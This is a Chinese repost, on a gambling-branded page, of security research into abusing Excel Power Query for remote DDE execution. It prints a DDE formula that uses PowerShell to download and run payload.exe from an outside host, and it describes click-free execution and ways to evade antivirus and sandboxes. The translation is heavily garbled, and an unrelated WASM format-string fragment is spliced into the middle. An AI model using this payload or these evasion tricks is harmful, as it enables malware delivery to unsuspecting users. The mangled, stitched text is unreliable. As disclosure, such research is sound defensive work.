欢迎访问Sunbet,Sunbet是欧博Allbet的官方网站!

首页Sunbet_安全防护正文

应用Excel power query完成长途DDE实行

b9e08c31ae1faa592019-07-023安全技术漏洞分析

Mimecast研究人员发明微软Excel东西的破绽,运用该破绽能够长途实行嵌入的歹意payload。

概述

研究人员发明运用Excel中的Power Query能够动态启动长途DDE(Dynamic Data Exchange,动态数据交换)进击,并掌握payload Power Query。
Power Query 是一个Excel插件,也是Power BI的一个组件,能够经由过程在Excel中经由过程简化数据发明、接见和协作的操纵,从而增强了贸易智能自助效劳体验。
Mimecast研究人员发明Power Query能够用来提议庞杂的、难以检测的进击运动。进击者运用Power Query能够将歹意内容嵌入到零丁的数据源中,然后当该内容翻开时将内容加载到表单中。进击者能够用歹意代码来开释和实行能够入侵用户机械的歹意软件。
该特性能够让进击者在流传payload之前对沙箱或受害者机械举行指纹操纵。进击者另有潜伏的pre-payload和pre-exploitation,能够流传歹意payload到受害者机械同时使文件绕过沙箱和其他平安解决方案。
下面研究人员供应一个运用Power Query来启动DDE破绽运用来开释和实行payload的潜伏破绽运用体式格局。

Power Query作为进击面的潜伏风险剖析

由于Power Query是微软Excel中一个壮大的东西,因而该特性被滥用的潜伏要挟也很大。假如该破绽被运用,就可能会被用于提议融会多个潜伏进击面的庞杂进击,包括当地权限提拔、DDE进击和长途代码实行破绽运用。
Power Query特性能够使进击者很轻易并动态地嵌入长途内容。这类进击很难检测,而且进击者有更多的机会来入侵受害者机械。运用Power Query中的潜伏破绽,进击者能够将歹意内容嵌入到payload中,但歹意内容自身并不会下载。
为了证实Power Query怎样被用于提议DDE破绽运用,能够将保留payload的外部web页面加载到电子表格中,如许就能够写一个定制的、简朴的HTTP效劳器到保留payload的web页面。HTTP效劳器监听80端口并将DDE内容作为来自电子表格的请求的相应音讯。

=cmd|'/c powershell -command "& { iwr https://www.dropbox.com/s/jo94jn2s3j84mfr/payload.exe?dl=1 -OutFile payload.exe }";cmd /c payload.exe'!A1,

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第1张

Excel 2016表格运用Power Query来请求歹意web页面(http://127.0.0.1:80

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第2张

长途内容被取回并加载到电子表格中。

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第3张

Wireshark猎取的数据能够看到进击流。第一个标记的包括有DDE花样:payload.exe保留的dropbox.com的DNS请求,保留和流传payload的HTTPS会话。

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第4张

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第5张

文件花样剖析

下面剖析文件花样,table/table1.xml是用特性name: “localhost”(默许)和type: “queryTable.”建立的。
表和特定查询表特性的链接在.”rels”流(_rels/table1.xml.rels)中有形貌,个中含有target域,指向的是../queryTables/queryTable1.xmlquetyTable1.xml含有运用connectionId域链接connection.xml的数据。链接是用Select *敕令和dbPr对象完成的。
Web查询自身保留在文档xl\customXL\item1中,是base64体式格局编码的。

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第6张

Base64解码后,研究人员翻开文档section1,个中含有查询自身。

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第7张

为了让DDE运转,用户须要双击该单元格来加载DDE,然后再次点击来开释。这些操纵会触发DDE并启动从web端吸收的payload。

WASM格式化字符串进击尝试

前置知识 wasm不是asm. wasm可以提高一些复杂计算的速度,比如一些游戏 wasm的内存布局不同与常见的x86体系,wasm分为线性内存、执行堆栈、局部变量等. wasm在调用函数时,由执行堆栈保存函数参数,以printf函数为例,其函数原型为 int printf(const char *restrict fmt, ...); 函数的参数分别为 格式化字符串 格式化字符串参数列表 我们编译以下代码 // emcc test.c -s WASM=1 -o test.js -g3 #include #include void EMSCRIPTEN_KEEPALIVE test() { sprintf("%d%d%d%d", 1, 2, 3, 4); return; } 在chrome中调试,可以看到在调用printf函数时执行堆栈的内容为 stack: 0: 1900 1: 4816 其中的0,1分别为printf的两个参数,1900,4816分别指向参数对应的线性内存地址,拿1900为例,其在线性内存中的值为 1900: 37 1901: 100 1902: 37 1903: 100 1904: 37 1905: 100 1906: 37 1907: 100 1908: 0 即%d%d%d%d\x00 部分读 获取栈上变量的值 当存在格式化字符串漏洞时,我们可以直接通过%d%d%d%d

绕过双击:启用自动实行

为了绕过点击才运转的题目,研究人员进一步剖析发明,老版本的office中的Get External Data>> From Web完成有一点差别。在运用Office 2016时,会建立dbPr,用户会被请求激活payload。而在老版本的office(2010版本)中,在Connections.xml下建立 的对象并非dbPr,而是webPr。与dbPr差别,webPr越发简朴一些,不须要任何交互就能够运转payload。

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第8张

绕过AV和沙箱:运用有破绽的Power Query东西

在web请求(查询)中增加header,payload就能够绕过阻拦特定歹意内容的AV和沙箱。只有当请求中存在某个特定的HTTP Header时,web效劳器才效劳于歹意内容。假如AV发送了一个测试请求,效劳器就会晓得这来源于AV而不是电子表格。
只有当RefererHTTP header设置为www.google.com.时,DEE才效劳于歹意内容。

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第9张

经由过程运用高等形式中的Power Query能够设置特定的web header。Power Query实行请求的Referer header的web请求。

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第10张

假如其他运用想要模仿Power Query行动,而且没有运用准确的Referer header来请求web页面,只有当运用Excel运用翻开原始文档时payload才事情。

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第11张

由于沙箱会发送定制header作为请求的一部分,因而就须要一种新的绕过检测的体式格局。Power Query中运用了auto refreshrefresh距离。

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第12张

防止歹意内容能够经由过程强迫使文件在翻开时移除外部数据源中的数据并更新数据,如许能够防止将该文件标记为歹意软件。这些特性都能够保证文件中的payload在文件翻开时更新。经由过程设置文件每分钟更新并在第10次查询时效劳payload。这就是说在10分钟内实行文件的沙箱没法猎取payload。

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第13张

在该例子中,大多数静态剖析AV没法检测该文件,而沙箱和其他平安解决方案绕过下载一次或两次内容也会错过payload。

应用Excel power query完成长途DDE实行  安全技术 漏洞分析 第14张

微软相应

MSRC收到了Mimecast平安研究人员给出的PoC和相干信息,但微软决议不修复该行动,然则能够运用组策略来阻拦外部数据衔接。微软在advisory (4053440)中供应了怎样指点用户确保运用在处置惩罚DDE域时是平安的要领。
https://www.mimecast.com/blog/2019/06/exploit-using-microsoft-excel-power-query-for-remote-dde-execution-discovered/


网友评论